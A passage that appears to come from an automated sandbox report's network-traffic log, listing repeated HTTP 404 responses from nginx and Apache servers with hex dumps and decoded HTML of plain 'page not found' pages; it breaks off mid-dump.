                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 20:49:30 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a5f968-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 20:49:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 20:49:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 20:49:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 20:49:45 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:49:52 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:49:54 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:49:57 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:50:00 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 